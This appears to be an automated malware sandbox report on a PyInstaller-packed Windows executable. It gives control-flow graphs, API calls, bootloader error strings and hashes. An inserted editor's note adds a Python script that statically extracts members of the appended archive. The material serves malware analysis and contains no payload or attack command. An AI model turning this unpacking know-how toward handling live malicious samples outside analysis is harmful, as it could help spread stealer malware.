393 7ff640505e5a-7ff640505e65 call 7ff6404f43f4 377->393 379->370 380->379
386 7ff640505d9f-7ff640505dd7 CreateFileW 380->386
391 7ff640505e82-7ff640505ed7 call 7ff6404f7748 384->391 385->391
392 7ff640505e7e 385->392 386->374 386->379
398 7ff640505ed9-7ff640505ee5 call 7ff640505bb0 391->398
399 7ff640505ef6-7ff640505f27 call 7ff640505728 391->399 392->391 393->370 398->399
404 7ff640505ee7 398->404
405 7ff640505f2d-7ff640505f6f 399->405
406 7ff640505f29-7ff640505f2b 399->406
407 7ff640505ee9-7ff640505ef1 call 7ff6404f9dd0 404->407
408 7ff640505f91-7ff640505f9c 405->408
409 7ff640505f71-7ff640505f75 405->409 406->407 407->381
412 7ff640505fa2-7ff640505fa6 408->412
413 7ff640506040 408->413 409->408
411 7ff640505f77-7ff640505f8c 409->411 411->408 412->413
415 7ff640505fac-7ff640505ff1 CloseHandle CreateFileW 412->415 413->381
416 7ff640505ff3-7ff640506021 GetLastError call 7ff6404f4368 call 7ff6404f7970 415->416
417 7ff640506026-7ff64050603b 415->417 416->417 417->413
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction ID: 96457cfd391f5a6e961bd355bdc95e6a6cce5f6f06dd05e2cbaebf67e8b3e16c
• Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
• Instruction Fuzzy Hash: 0BC1DF32B2CA5296EB14FF68C5906AD3765FB8AB98B010235DF2E97794CF38E551C300
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
• Instruction ID: 5fe66202e177d99c7f807aff829b301774400ae6d1a0f4e7f2fd14126836dceb
• Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
• Instruction Fuzzy Hash: 45F0A432A1C652D6FB70FB60B59836A7350EB44328F040239D96D427D4CF7CD058CB00

Control-flow Graph

control_flow_graph (one basic block per line: block id, address range, calls/APIs, then the edges reported after it)
179 7ff6404e18f0-7ff6404e192b call 7ff6404e3f70
182 7ff6404e1bc1-7ff6404e1be5 call 7ff6404eb870 179->182
183 7ff6404e1931-7ff6404e1971 call 7ff6404e76a0 179->183
188 7ff6404e1bae-7ff6404e1bb1 call 7ff6404ef36c 183->188
189 7ff6404e1977-7ff6404e1987 call 7ff6404ef9f4 183->189
192 7ff6404e1bb6-7ff6404e1bbe 188->192
194 7ff6404e19a1-7ff6404e19bd call 7ff6404ef6bc 189->194
195 7ff6404e1989-7ff6404e199c call 7ff6404e2760 189->195 192->182
200 7ff6404e19bf-7ff6404e19d2 call 7ff6404e2760 194->200
201 7ff6404e19d7-7ff6404e19ec call 7ff6404f4154 194->201 195->188 200->188
206 7ff6404e19ee-7ff6404e1a01 call 7ff6404e2760 201->206
207 7ff6404e1a06-7ff6404e1a87 call 7ff6404e1bf0 * 2 call 7ff6404ef9f4 201->207 206->188
215 7ff6404e1a8c-7ff6404e1a9f call 7ff6404f4170 207->215
218 7ff6404e1aa1-7ff6404e1ab4 call 7ff6404e2760 215->218
219 7ff6404e1ab9-7ff6404e1ad2 call 7ff6404ef6bc 215->219 218->188
224 7ff6404e1ad4-7ff6404e1ae7 call 7ff6404e2760 219->224
225 7ff6404e1aec-7ff6404e1b08 call 7ff6404ef430 219->225 224->188
230 7ff6404e1b1b-7ff6404e1b29 225->230
231 7ff6404e1b0a-7ff6404e1b16 call 7ff6404e25f0 225->231 230->188
233 7ff6404e1b2f-7ff6404e1b3e 230->233 231->188
235 7ff6404e1b40-7ff6404e1b46 233->235
236 7ff6404e1b60-7ff6404e1b6f 235->236
237 7ff6404e1b48-7ff6404e1b55 235->237 236->236
238 7ff6404e1b71-7ff6404e1b7a 236->238 237->238
239 7ff6404e1b8f 238->239
240 7ff6404e1b7c-7ff6404e1b7f 238->240
241 7ff6404e1b91-7ff6404e1bac 239->241 240->239
242 7ff6404e1b81-7ff6404e1b84 240->242 241->188 241->235 242->239
243 7ff6404e1b86-7ff6404e1b89 242->243 243->239
244 7ff6404e1b8b-7ff6404e1b8d 243->244 244->241
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _fread_nolock$Message
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 677216364-3497178890
• Opcode ID: 47a0cc69fe61a424f4972c633dfe31ec108281a37c3b7613119bd6498f8acb77
• Instruction ID: 6bbb6f01bdc374e6d4f218129cfe3cf7c1562051f67e955ab5da4f0e7476a31b
• Opcode Fuzzy Hash: 47a0cc69fe61a424f4972c633dfe31ec108281a37c3b7613119bd6498f8acb77
• Instruction Fuzzy Hash: 2671C231B1C6A6E9EB24FB24D5902BD2390FF89784F444035D98DC77AAEE6CE5448B80

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2030045667-3659356012
• Opcode ID: 32997523cec49d72c5576cc17cb243c2ce74323f184c21c719246cd1ab96f7c6
• Instruction ID: 455708967c697a7a751e8e5b98a73296f6f9c874213de976e6b7dfda8cda0fd9
• Opcode Fuzzy Hash: 32997523cec49d72c5576cc17cb243c2ce74323f184c21c719246cd1ab96f7c6
• Instruction Fuzzy Hash: 8341BF32B4C663E2FA24FB15A9405BA63A0FF84BD4F444432DE5E87BA5EE3CE5418740

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                            • Opcode ID: 86bef0d86d3d5020898d8012f61f6e4267f785464e2bead425cceb05c7e2cebb
                                                                                                                                                                                                                                                            • Instruction ID: 235a19356c93ce3a42da2f38b45c00a33ccb645bdc8f96a1bfa84f363406d5ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86bef0d86d3d5020898d8012f61f6e4267f785464e2bead425cceb05c7e2cebb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51E172A0C662E1FA20FB15A9403BA6291FB85794F440135EE5DC7BE6EF3CE541C780

Control-flow Graph

(Graph image not extracted.) Function at 00007FF6404FAD6C, basic blocks 7ff6404fad6c through 7ff6404fb1b8; graph legend: Executed / Not Executed. Windows API calls shown in the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError. Internal call targets: 7ff6404f43d4, 7ff6404f43f4, 7ff6404f9bf0, 7ff6404f9c58, 7ff6404fc90c, 7ff6404fb594, 7ff640502c2c, 7ff6404f4368, 7ff6404fa984, 7ff6404fa7c4.
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
• Instruction ID: 1befe4a4177dd3b3873daa27a92c6d9d73791894762db0d4e42a47cfc4a13dbd
• Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
• Instruction Fuzzy Hash: 6FC10162A0C6A7F1EB64BB1494402BE37AAFB92BC0F550131EA5D877D1CF7CE8558740

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6404E3534), ref: 00007FF6404E3411
  • Part of subcall function 00007FF6404E29E0: GetLastError.KERNEL32(?,?,?,00007FF6404E342E,?,00007FF6404E3534), ref: 00007FF6404E2A14
  • Part of subcall function 00007FF6404E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6404E342E), ref: 00007FF6404E2A7D
  • Part of subcall function 00007FF6404E29E0: MessageBoxW.USER32 ref: 00007FF6404E2ACF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ErrorFileFormatLastModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 517058245-2863816727
• Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction ID: 38c06243298b15ed8099fe7993e28303999cab98f5eaaac513a8b9e0303a0545
• Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
• Instruction Fuzzy Hash: A121A461B1C563F1FE25FB24E9553BA1260BF49395F800236DA6DC67D6EE2CE504C780
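Editor's note on the two function blocks above: the strings "Failed to extract %s: inflateInit() failed with return code %d!" (with the zlib version string 1.3.1 beside it) and "Failed to obtain executable path." / "Failed to resolve full path to executable %ls." are the error messages of the PyInstaller onefile bootloader, which resolves its own path with GetModuleFileNameW, locates the archive appended to that executable, and inflates each member with zlib, reporting failures through MessageBoxW. That is consistent with the report's "Python Stealer" verdict, and it means the Python payload can be recovered from the file without running it. The following is an added triage example, not code from the report or from the PyInstaller project: it finds the archive cookie, walks the table of contents and inflates a member. It assumes the PyInstaller 2.1+ cookie layout (8-byte magic "MEI\x0c\x0b\x0a\x0b\x0e" followed by archive length, TOC offset, TOC length, Python version and a 64-byte library name) and the 18-byte TOC entry header; the sample archive in build_sample() is constructed here for the test, with an assumed Python version field of 311 and library name python311.dll.

```python
"""Parse the PyInstaller onefile archive ("CArchive") appended to an executable.

Added triage example; not code from the report or from PyInstaller. Assumed
layout: the PyInstaller 2.1+ cookie (8-byte magic + 64-byte pylib name, 88
bytes) and the '!IIIIBB' TOC entry header. build_sample() constructs a fake
input so the script runs offline.
"""
import struct
import sys
import zlib

COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, archive_len, toc_offset, toc_len, pyvers, pylib_name
COOKIE_FMT = "!8sIIII64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)            # 88
# entry_len, data_offset, data_len, uncompressed_len, cflag, typecode (+ name)
TOC_ENTRY_FMT = "!IIIIBB"
TOC_ENTRY_LEN = struct.calcsize(TOC_ENTRY_FMT)      # 18


def find_cookie(blob):
    """Offset of the cookie. Search backwards, as the bootloader does, because
    an Authenticode signature or other overlay data may follow the archive."""
    pos = blob.rfind(COOKIE_MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    return pos


def parse_archive(blob):
    """Return {'pyvers', 'pylib', 'start', 'entries'} for the archive in blob."""
    cookie_pos = find_cookie(blob)
    _, archive_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_pos:cookie_pos + COOKIE_LEN])
    # Member and TOC offsets are relative to the archive start; the archive
    # length recorded in the cookie includes the cookie itself.
    start = cookie_pos + COOKIE_LEN - archive_len
    if start < 0 or start + toc_off + toc_len > len(blob):
        raise ValueError("cookie describes an archive outside the file")
    entries = []
    pos = start + toc_off
    end = pos + toc_len
    while pos < end:
        entry_len, off, dlen, ulen, cflag, typecode = struct.unpack(
            TOC_ENTRY_FMT, blob[pos:pos + TOC_ENTRY_LEN])
        if entry_len < TOC_ENTRY_LEN or pos + entry_len > end:
            raise ValueError("corrupt TOC entry at offset %d" % pos)
        name = blob[pos + TOC_ENTRY_LEN:pos + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append({"name": name, "offset": off, "len": dlen, "ulen": ulen,
                        "compressed": bool(cflag), "type": chr(typecode)})
        pos += entry_len
    return {"pyvers": pyvers, "pylib": pylib.rstrip(b"\0").decode("utf-8"),
            "start": start, "entries": entries}


def extract(blob, info, name):
    """Bytes of one member, inflated when cflag is set (the step behind the
    'Failed to extract %s: inflateInit() ...' messages). The uncompressed
    length is checked against the TOC, as the bootloader does."""
    entry = next(e for e in info["entries"] if e["name"] == name)
    lo = info["start"] + entry["offset"]
    raw = blob[lo:lo + entry["len"]]
    data = zlib.decompress(raw) if entry["compressed"] else raw
    if len(data) != entry["ulen"]:
        raise ValueError("%s: uncompressed length mismatch" % name)
    return data


def build_sample():
    """Constructed input (not a real sample): a fake MZ prefix, one zlib-compressed
    script member and one empty runtime-option member, then TOC and cookie."""
    members = [("stub", b"s", b"import os\nprint('hello from the stub')\n", True),
               ("pyi-windows-manifest-filename stub.exe.manifest", b"o", b"", False)]
    payload, toc = b"", b""
    for name, typecode, data, compress in members:
        stored = zlib.compress(data) if compress else data
        nm = name.encode("utf-8") + b"\0"
        entry_len = TOC_ENTRY_LEN + len(nm)
        entry_len += (-entry_len) % 16        # assumed padding of the name field
        toc += struct.pack(TOC_ENTRY_FMT, entry_len, len(payload), len(stored),
                           len(data), int(compress), typecode[0])
        toc += nm.ljust(entry_len - TOC_ENTRY_LEN, b"\0")
        payload += stored
    archive_len = len(payload) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, archive_len, len(payload),
                         len(toc), 311, b"python311.dll")   # assumed: 3.11
    return b"MZ" + b"\x90" * 510 + payload + toc + cookie


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    info = parse_archive(blob)
    print("python %d, %s, archive at 0x%x" % (info["pyvers"], info["pylib"], info["start"]))
    for e in info["entries"]:
        print("%s %-7d %-7d %s %s" % (e["type"], e["len"], e["ulen"],
                                      "z" if e["compressed"] else "-", e["name"]))
```

Run it against the dropped or submitted executable to list the members; the "s" (script) entries are the stealer's own entry-point scripts, and the "z" entry is the PYZ bundle of compiled modules, which needs a further step (the PYZ format and, for some builds, a decryption key) that this example does not cover. The length check in extract() matters when triaging tampered samples: a member whose inflated size disagrees with the TOC is exactly the case the bootloader refuses with the "decompression resulted in return code %d" message.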

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
• Instruction ID: b812c0209f54b6a60e057f1f873657876772e2061edb54fed5764d39b177f2ce
• Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
• Instruction Fuzzy Hash: BE41B062E1C79293F354FB6095503696266FBD47A4F109334EAAC83BD1EF6CA1E08700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
                                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                                            • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction ID: 4535f9a2bdabda74afa0a46e2157a74f4d229af8e152e6f74e7c852a6d44e2ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B314D21E1C273E1FA54FBA495513B91382AF41389F440039EA5DCB7D3DE2DA9468781

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction ID: 275b5b68ebe631f5b405311be8789fbbdaaaa0075aa6f363818cb514755840b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD06C24B1C62AE6FB6C3B70599917D1226AFA9B55F10193CD85A8A393CE2CA8098340
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                                                                                                                                                                                            • Instruction ID: ca09be03a7b31e671568cd9be017c4c4c3ddd44007bcefd41ad6f2076da691d1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C151F961B0D662E6FA28FE35940067A6281FF94BB8F144734DD6C877D5CE3CE4019760
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction ID: 11897ebdb6b1aed41625d52ba5738dee62e4ce4432e9c10f9297da2409d0f1b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811C161B0CAA1D1DA10FB25A94416D6366EB45BF4F640331EEBD87BEACF3CD0508740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
